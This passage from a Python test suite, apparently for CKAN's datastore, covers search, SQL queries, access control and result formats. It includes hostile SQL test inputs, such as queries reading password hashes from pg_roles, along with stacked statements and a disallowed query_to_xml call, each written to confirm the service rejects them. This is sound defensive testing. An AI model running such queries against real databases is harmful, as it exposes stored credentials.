assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column_even_if_q_is_a_json_string(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"q": u'{"b\xfck": "annakarenina"}',
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_name(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"invalid_field_name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_value(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"author": ["invalid", "value"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_table_metadata(self, app):
data = {"resource_id": "_table_metadata"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_filters_not_as_dict(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": "the-filter",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_filters(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": {"invalid-column-name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_fields(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": ["invalid-column-name"],
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("fields") is not None, res_dict["error"]
class TestDatastoreFullTextSearchLegacyTests(object):
    """Legacy functional tests for full-text ``q`` search over a table
    mixing text, date and numeric columns.

    Each test POSTs to /api/action/datastore_search and checks the
    reported ``total`` of matching rows.
    """

    @pytest.fixture(autouse=True)
    def initial_data(self, clean_datastore, app):
        """Create a datastore table with six sample rows before each test."""
        ctd.CreateTestData.create()
        self.sysadmin_user = model.User.get("testsysadmin")
        self.normal_user = model.User.get("annafan")
        resource = model.Package.get("annakarenina").resources[0]
        # Only "date" gets an explicit type; the rest are inferred.
        self.data = dict(
            resource_id=resource.id,
            force=True,
            fields=[
                {"id": "id"},
                {"id": "date", "type": "date"},
                {"id": "x"},
                {"id": "y"},
                {"id": "z"},
                {"id": "country"},
                {"id": "title"},
                {"id": "lat"},
                {"id": "lon"},
            ],
            records=[
                {
                    "id": 0,
                    "date": "2011-01-01",
                    "x": 1,
                    "y": 2,
                    "z": 3,
                    "country": "DE",
                    "title": "first 99",
                    "lat": 52.56,
                    "lon": 13.40,
                },
                {
                    "id": 1,
                    "date": "2011-02-02",
                    "x": 2,
                    "y": 4,
                    "z": 24,
                    "country": "UK",
                    "title": "second",
                    "lat": 54.97,
                    "lon": -1.60,
                },
                {
                    "id": 2,
                    "date": "2011-03-03",
                    "x": 3,
                    "y": 6,
                    "z": 9,
                    "country": "US",
                    "title": "third",
                    "lat": 40.00,
                    "lon": -75.5,
                },
                {
                    "id": 3,
                    "date": "2011-04-04",
                    "x": 4,
                    "y": 8,
                    "z": 6,
                    "country": "UK",
                    "title": "fourth",
                    "lat": 57.27,
                    "lon": -6.20,
                },
                {
                    "id": 4,
                    "date": "2011-05-04",
                    "x": 5,
                    "y": 10,
                    "z": 15,
                    "country": "UK",
                    "title": "fifth",
                    "lat": 51.58,
                    "lon": 0,
                },
                {
                    "id": 5,
                    "date": "2011-06-02",
                    "x": 6,
                    "y": 12,
                    "z": 18,
                    "country": "DE",
                    "title": "sixth 53.56",
                    "lat": 51.04,
                    "lon": 7.9,
                },
            ],
        )
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_create", json=self.data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_search_full_text(self, app):
        """A plain word query matches the two rows whose country is DE."""
        data = {"resource_id": self.data["resource_id"], "q": "DE"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 2

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_advanced_search_full_text(self, app):
        """With plain=False, tsquery operators such as ``|`` (OR) work."""
        data = {
            "resource_id": self.data["resource_id"],
            "plain": "False",
            "q": "DE | UK",
        }
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        # 2 DE rows + 3 UK rows.
        assert res_dict["result"]["total"] == 5

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_integers_within_text_strings(self, app):
        """An integer token inside a text value ("first 99") is matched."""
        data = {"resource_id": self.data["resource_id"], "q": "99"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_integers(self, app):
        """An integer query matches numeric column values across rows."""
        data = {"resource_id": self.data["resource_id"], "q": "4"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 3

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_decimal_within_text_strings(self, app):
        """A decimal token inside a text value ("sixth 53.56") is matched."""
        data = {"resource_id": self.data["resource_id"], "q": "53.56"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_decimal(self, app):
        """A decimal query matches a numeric (lat) column value."""
        data = {"resource_id": self.data["resource_id"], "q": "52.56"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_date(self, app):
        """An ISO date query matches the row with that date value."""
        data = {"resource_id": self.data["resource_id"], "q": "2011-01-01"}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["result"]["total"] == 1

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_full_text_search_on_json_like_string_succeeds(self, app):
        """A JSON-looking query string must not break the search call."""
        data = {"resource_id": self.data["resource_id"], "q": '"{}"'}
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"]
class TestDatastoreSQLLegacyTests(object):
    """Legacy functional tests for the datastore_search_sql action:
    plain SELECTs, self-joins, and authorization on private resources
    and system tables.
    """

    # Populated by the autouse fixture below.
    sysadmin_user = None
    normal_user = None

    @pytest.fixture(autouse=True)
    def initial_data(self, clean_datastore, app):
        """Create a datastore table (aliased "books4"), a test org, and
        the expected result fixtures used by the SQL tests."""
        ctd.CreateTestData.create()
        self.sysadmin_user = model.User.get("testsysadmin")
        self.normal_user = model.User.get("annafan")
        self.dataset = model.Package.get("annakarenina")
        resource = self.dataset.resources[0]
        self.data = {
            "resource_id": resource.id,
            "force": True,
            "aliases": "books4",
            "fields": [
                {"id": u"b\xfck", "type": "text"},
                {"id": "author", "type": "text"},
                {"id": "published"},
            ],
            "records": [
                {
                    u"b\xfck": "annakarenina",
                    "author": "tolstoy",
                    "published": "2005-03-01",
                    "nested": ["b", {"moo": "moo"}],
                },
                {
                    u"b\xfck": "warandpeace",
                    "author": "tolstoy",
                    "nested": {"a": "b"},
                },
            ],
        }
        auth = {"Authorization": str(self.sysadmin_user.apikey)}
        res = app.post(
            "/api/action/datastore_create", json=self.data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True
        # Make an organization, because private datasets must belong to one.
        self.organization = tests.call_action_api(
            app,
            "organization_create",
            name="test_org",
            apikey=self.sysadmin_user.apikey,
        )
        # _full_text entries are lexemes expected *within* the tsvector,
        # not an exact value — see the membership checks in the tests.
        self.expected_records = [
            {
                u"_full_text": [
                    u"'annakarenina'",
                    u"'b'",
                    u"'moo'",
                    u"'tolstoy'",
                    u"'2005'",
                ],
                u"_id": 1,
                u"author": u"tolstoy",
                u"b\xfck": u"annakarenina",
                u"nested": [u"b", {u"moo": u"moo"}],
                u"published": u"2005-03-01T00:00:00",
            },
            {
                u"_full_text": [u"'tolstoy'", u"'warandpeac'", u"'b'"],
                u"_id": 2,
                u"author": u"tolstoy",
                u"b\xfck": u"warandpeace",
                u"nested": {u"a": u"b"},
                u"published": None,
            },
        ]
        self.expected_join_results = [
            {u"first": 1, u"second": 1},
            {u"first": 1, u"second": 2},
        ]
        engine = db.get_write_engine()
        self.Session = orm.scoped_session(orm.sessionmaker(bind=engine))

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_select_where_like_with_percent(self, app):
        """A LIKE pattern containing % passes through SQL search intact."""
        query = 'SELECT * FROM public."{0}" WHERE "author" LIKE \'tol%\''.format(
            self.data["resource_id"]
        )
        data = {"sql": query}
        auth = {"Authorization": str(self.sysadmin_user.apikey)}
        res = app.post(
            "/api/action/datastore_search_sql", json=data, extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True
        result = res_dict["result"]
        assert len(result["records"]) == len(self.expected_records)
        for (row_index, row) in enumerate(result["records"]):
            expected_row = self.expected_records[row_index]
            assert set(row.keys()) == set(expected_row.keys())
            for field in row:
                if field == "_full_text":
                    # tsvector ordering is unspecified; check membership only.
                    for ft_value in expected_row["_full_text"]:
                        assert ft_value in row["_full_text"]
                else:
                    assert row[field] == expected_row[field]

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_self_join(self, app):
        """A self-join on the same resource table is permitted."""
        query = """
            select a._id as first, b._id as second
            from "{0}" AS a,
                 "{0}" AS b
            where a.author = b.author
            limit 2
            """.format(
            self.data["resource_id"]
        )
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search_sql",
            json={"sql": query},
            extra_environ=auth,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is True
        result = res_dict["result"]
        assert result["records"] == self.expected_join_results

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures(
        "clean_datastore", "with_plugins", "with_request_context"
    )
    def test_new_datastore_table_from_private_resource(self, app):
        """SQL search against a private dataset's table is denied (403)
        for a user outside the owning organization."""
        # make a private CKAN resource
        group = self.dataset.get_groups()[0]
        context = {
            "user": self.sysadmin_user.name,
            "ignore_auth": True,
            "model": model,
        }
        package = p.toolkit.get_action("package_create")(
            context,
            {
                "name": "privatedataset",
                "private": True,
                "owner_org": self.organization["id"],
                "groups": [{"id": group.id}],
            },
        )
        resource = p.toolkit.get_action("resource_create")(
            context,
            {
                "name": "privateresource",
                "url": "https://www.example.com/",
                "package_id": package["id"],
            },
        )
        auth = {"Authorization": str(self.sysadmin_user.apikey)}
        helpers.call_action(
            "datastore_create", resource_id=resource["id"], force=True
        )
        # new resource should be private
        query = 'SELECT * FROM "{0}"'.format(resource["id"])
        data = {"sql": query}
        # Note: the normal user's key replaces the sysadmin auth here.
        auth = {"Authorization": str(self.normal_user.apikey)}
        res = app.post(
            "/api/action/datastore_search_sql",
            json=data,
            extra_environ=auth,
            status=403,
        )
        res_dict = json.loads(res.data)
        assert res_dict["success"] is False
        assert res_dict["error"]["__type"] == "Authorization Error"

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_not_authorized_to_access_system_tables(self, app):
        """Queries touching pg_catalog system tables are rejected (403),
        including via joins against a legitimate resource table."""
        test_cases = [
            "SELECT * FROM pg_roles",
            "SELECT * FROM pg_catalog.pg_database",
            "SELECT rolpassword FROM pg_roles",
            """SELECT p.rolpassword
               FROM pg_roles p
               JOIN "{0}" r
               ON p.rolpassword = r.author""".format(
                self.data["resource_id"]
            ),
        ]
        for query in test_cases:
            data = {"sql": query.replace("\n", "")}
            res = app.post(
                "/api/action/datastore_search_sql", json=data, status=403,
            )
            res_dict = json.loads(res.data)
            assert res_dict["success"] is False
            assert res_dict["error"]["__type"] == "Authorization Error"
class TestDatastoreSQLFunctional(object):
    """Functional tests for datastore_search_sql invoked through
    helpers.call_action: privacy enforcement, statement validation,
    function allow-listing and the rows_max limit.
    """

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures(
        "clean_datastore", "with_plugins", "with_request_context"
    )
    def test_search_sql_enforces_private(self):
        """Members may query only their own orgs' private tables; a join
        across two private tables requires membership in both orgs."""
        user1 = factories.User()
        user2 = factories.User()
        user3 = factories.User()
        ctx1 = {u"user": user1["name"], u"ignore_auth": False}
        ctx2 = {u"user": user2["name"], u"ignore_auth": False}
        ctx3 = {u"user": user3["name"], u"ignore_auth": False}
        # user3 is a member of both organizations.
        org1 = factories.Organization(
            user=user1,
            users=[{u"name": user3["name"], u"capacity": u"member"}],
        )
        org2 = factories.Organization(
            user=user2,
            users=[{u"name": user3["name"], u"capacity": u"member"}],
        )
        ds1 = factories.Dataset(owner_org=org1["id"], private=True)
        ds2 = factories.Dataset(owner_org=org2["id"], private=True)
        r1 = helpers.call_action(
            u"datastore_create",
            resource={u"package_id": ds1["id"]},
            fields=[{u"id": u"spam", u"type": u"text"}],
        )
        r2 = helpers.call_action(
            u"datastore_create",
            resource={u"package_id": ds2["id"]},
            fields=[{u"id": u"ham", u"type": u"text"}],
        )
        sql1 = 'SELECT spam FROM "{0}"'.format(r1["resource_id"])
        sql2 = 'SELECT ham FROM "{0}"'.format(r2["resource_id"])
        # sql3 joins both private tables.
        sql3 = 'SELECT spam, ham FROM "{0}", "{1}"'.format(
            r1["resource_id"], r2["resource_id"]
        )
        # Cross-org access must be denied...
        with pytest.raises(p.toolkit.NotAuthorized):
            helpers.call_action("datastore_search_sql", context=ctx2, sql=sql1)
        with pytest.raises(p.toolkit.NotAuthorized):
            helpers.call_action("datastore_search_sql", context=ctx1, sql=sql2)
        with pytest.raises(p.toolkit.NotAuthorized):
            helpers.call_action("datastore_search_sql", context=ctx1, sql=sql3)
        with pytest.raises(p.toolkit.NotAuthorized):
            helpers.call_action("datastore_search_sql", context=ctx2, sql=sql3)
        # ...while members of the owning org(s) succeed.
        helpers.call_action("datastore_search_sql", context=ctx1, sql=sql1)
        helpers.call_action("datastore_search_sql", context=ctx2, sql=sql2)
        helpers.call_action("datastore_search_sql", context=ctx3, sql=sql3)

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_validates_sql_has_a_single_statement(self):
        """Two semicolon-separated statements raise ValidationError."""
        resource = factories.Resource()
        data = {
            "resource_id": resource["id"],
            "force": True,
            "records": [{"the year": 2014}, {"the year": 2013}],
        }
        helpers.call_action("datastore_create", **data)
        sql = 'SELECT * FROM public."{0}"; SELECT * FROM public."{0}";'.format(
            resource["id"]
        )
        with pytest.raises(
            p.toolkit.ValidationError, match="Query is not a single statement"
        ):
            helpers.call_action("datastore_search_sql", sql=sql)

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_works_with_semicolons_inside_strings(self):
        """A semicolon inside a quoted literal is not a statement break."""
        resource = factories.Resource()
        data = {
            "resource_id": resource["id"],
            "force": True,
            "records": [{"author": "bob"}, {"author": "jane"}],
        }
        helpers.call_action("datastore_create", **data)
        sql = 'SELECT * FROM public."{0}" WHERE "author" = \'foo; bar\''.format(
            resource["id"]
        )
        helpers.call_action("datastore_search_sql", sql=sql)

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_works_with_allowed_functions(self):
        """Allow-listed SQL functions such as upper() may be called."""
        resource = factories.Resource()
        data = {
            "resource_id": resource["id"],
            "force": True,
            "records": [{"author": "bob"}, {"author": "jane"}],
        }
        helpers.call_action("datastore_create", **data)
        sql = 'SELECT upper(author) from "{}"'.format(
            resource["id"]
        )
        helpers.call_action("datastore_search_sql", sql=sql)

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_not_authorized_with_disallowed_functions(self):
        """Functions outside the allow-list (query_to_xml) are rejected."""
        resource = factories.Resource()
        data = {
            "resource_id": resource["id"],
            "force": True,
            "records": [{"author": "bob"}, {"author": "jane"}],
        }
        helpers.call_action("datastore_create", **data)
        sql = "SELECT query_to_xml('SELECT upper(author) from \"{}\"', true, true, '')".format(
            resource["id"]
        )
        with pytest.raises(p.toolkit.NotAuthorized):
            helpers.call_action("datastore_search_sql", sql=sql)

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_invalid_statement(self):
        """Syntactically broken SQL raises ValidationError with the
        database's syntax-error message."""
        sql = "SELECT ** FROM foobar"
        with pytest.raises(
            logic.ValidationError, match='syntax error at or near "FROM"'
        ):
            helpers.call_action("datastore_search_sql", sql=sql)

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_select_basic(self):
        """SELECT * returns all rows with correct values; _full_text is
        checked by lexeme membership rather than exact equality."""
        resource = factories.Resource()
        data = {
            "resource_id": resource["id"],
            "force": True,
            "records": [
                {
                    u"b\xfck": "annakarenina",
                    "author": "tolstoy",
                    "published": "2005-03-01",
                    "nested": ["b", {"moo": "moo"}],
                },
                {
                    u"b\xfck": "warandpeace",
                    "author": "tolstoy",
                    "nested": {"a": "b"},
                },
            ],
        }
        expected_records = [
            {
                u"_full_text": [
                    u"'annakarenina'",
                    u"'b'",
                    u"'moo'",
                    u"'tolstoy'",
                    u"'2005'",
                ],
                u"_id": 1,
                u"author": u"tolstoy",
                u"b\xfck": u"annakarenina",
                u"nested": [u"b", {u"moo": u"moo"}],
                u"published": u"2005-03-01T00:00:00",
            },
            {
                u"_full_text": [u"'tolstoy'", u"'warandpeac'", u"'b'"],
                u"_id": 2,
                u"author": u"tolstoy",
                u"b\xfck": u"warandpeace",
                u"nested": {u"a": u"b"},
                u"published": None,
            },
        ]
        helpers.call_action("datastore_create", **data)
        sql = 'SELECT * FROM "{0}"'.format(resource["id"])
        result = helpers.call_action("datastore_search_sql", sql=sql)
        assert len(result["records"]) == 2
        for (row_index, row) in enumerate(result["records"]):
            expected_row = expected_records[row_index]
            assert set(row.keys()) == set(expected_row.keys())
            for field in row:
                if field == "_full_text":
                    for ft_value in expected_row["_full_text"]:
                        assert ft_value in row["_full_text"]
                else:
                    assert row[field] == expected_row[field]
        # Below the rows_max limit no truncation flag should be present.
        assert u"records_truncated" not in result

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    def test_alias_search(self):
        """Querying by table alias returns the same rows as by id."""
        resource = factories.Resource()
        data = {
            "resource_id": resource["id"],
            "force": True,
            "aliases": "books4",
            "records": [
                {
                    u"b\xfck": "annakarenina",
                    "author": "tolstoy",
                    "published": "2005-03-01",
                    "nested": ["b", {"moo": "moo"}],
                },
                {
                    u"b\xfck": "warandpeace",
                    "author": "tolstoy",
                    "nested": {"a": "b"},
                },
            ],
        }
        helpers.call_action("datastore_create", **data)
        sql = 'SELECT * FROM "{0}"'.format(resource["id"])
        result = helpers.call_action("datastore_search_sql", sql=sql)
        sql = 'SELECT * FROM "books4"'
        result_with_alias = helpers.call_action(
            "datastore_search_sql", sql=sql
        )
        assert result["records"] == result_with_alias["records"]

    @pytest.mark.ckan_config("ckan.plugins", "datastore")
    @pytest.mark.usefixtures("clean_datastore", "with_plugins")
    @pytest.mark.ckan_config("ckan.datastore.search.rows_max", "2")
    def test_search_limit(self):
        """With rows_max=2, results are capped at two rows and flagged
        via records_truncated."""
        resource = factories.Resource()
        data = {
            "resource_id": resource["id"],
            "force": True,
            "records": [
                {"the year": 2014},
                {"the year": 2013},
                {"the year": 2015},
                {"the year": 2016},
            ],
        }
        result = helpers.call_action("datastore_create", **data)
        sql = 'SELECT * FROM "{0}"'.format(resource["id"])
        result = helpers.call_action("datastore_search_sql", sql=sql)
        assert len(result["records"]) == 2
        # Insertion order is preserved for the first rows_max records.
        assert [res[u"the year"] for res in result["records"]] == [2014, 2013]
        assert result[u"records_truncated"]
@pytest.mark.usefixtures("with_request_context")
class TestDatastoreSearchRecordsFormat(object):
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_sort_results_objects(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 10, u"dt": u"2020-01-01", u"txt": "aaab"},
{u"num": 9, u"dt": u"2020-01-02", u"txt": "aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": "aaac"},
],
)
assert helpers.call_action(
"datastore_search", resource_id=r["resource_id"], sort=u"num, dt"
)["records"] == [
{
u"_id": 3,
u"num": 9,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaac",
},
{
u"_id": 2,
u"num": 9,
u"dt": u"2020-01-02T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 1,
u"num": 10,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaab",
},
]
assert helpers.call_action(
"datastore_search", resource_id=r["resource_id"], sort=u"dt, txt"
)["records"] == [
{
u"_id": 1,
u"num": 10,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 3,
u"num": 9,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaac",
},
{
u"_id": 2,
u"num": 9,
u"dt": u"2020-01-02T00:00:00",
u"txt": u"aaab",
},
]
assert helpers.call_action(
"datastore_search", resource_id=r["resource_id"], sort=u"txt, num"
)["records"] == [
{
u"_id": 2,
u"num": 9,
u"dt": u"2020-01-02T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 1,
u"num": 10,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 3,
u"num": 9,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaac",
},
]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_sort_results_lists(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 10, u"dt": u"2020-01-01", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-02", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": u"aaac"},
],
)
assert helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"lists",
sort=u"num, dt",
)["records"] == [
[3, 9, u"2020-01-01T00:00:00", u"aaac"],
[2, 9, u"2020-01-02T00:00:00", u"aaab"],
[1, 10, u"2020-01-01T00:00:00", u"aaab"],
]
assert helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"lists",
sort=u"dt, txt",
)["records"] == [
[1, 10, u"2020-01-01T00:00:00", u"aaab"],
[3, 9, u"2020-01-01T00:00:00", u"aaac"],
[2, 9, u"2020-01-02T00:00:00", u"aaab"],
]
assert helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"lists",
sort=u"txt, num",
)["records"] == [
[2, 9, u"2020-01-02T00:00:00", u"aaab"],
[1, 10, u"2020-01-01T00:00:00", u"aaab"],
[3, 9, u"2020-01-01T00:00:00", u"aaac"],
]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_sort_results_csv(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 10, u"dt": u"2020-01-01", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-02", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": u"aaac"},
],
)
assert (
helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
sort=u"num, dt",
)["records"]
== u"3,9,2020-01-01T00:00:00,aaac\n"
u"2,9,2020-01-02T00:00:00,aaab\n"
u"1,10,2020-01-01T00:00:00,aaab\n"
)
assert (
helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
sort=u"dt, txt",
)["records"]
== u"1,10,2020-01-01T00:00:00,aaab\n"
u"3,9,2020-01-01T00:00:00,aaac\n"
u"2,9,2020-01-02T00:00:00,aaab\n"
)
assert (
helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
sort=u"txt, num",
)["records"]
== u"2,9,2020-01-02T00:00:00,aaab\n"
u"1,10,2020-01-01T00:00:00,aaab\n"
u"3,9,2020-01-01T00:00:00,aaac\n"
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_fields_results_csv(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 9, u"dt": u"2020-01-02", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": u"aaac"},
],
)
r = helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
fields=u"dt, num, txt",
)
assert r["fields"] == [
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"num", u"type": u"numeric"},
{u"id": u"txt", u"type": u"text"},
]
assert (
r["records"] == u"2020-01-02T00:00:00,9,aaab\n"
u"2020-01-01T00:00:00,9,aaac\n"
)
r = helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
fields=u"dt",
q=u"aaac",
)
assert r["fields"] == [{u"id": u"dt", u"type": u"timestamp"}]
assert r["records"] == u"2020-01-01T00:00:00\n"
r = helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
fields=u"txt, rank txt",
q={u"txt": u"aaac"},
)
assert r["fields"] == [
{u"id": u"txt", u"type": u"text"},
{u"id": u"rank txt", u"type": u"float"},
]
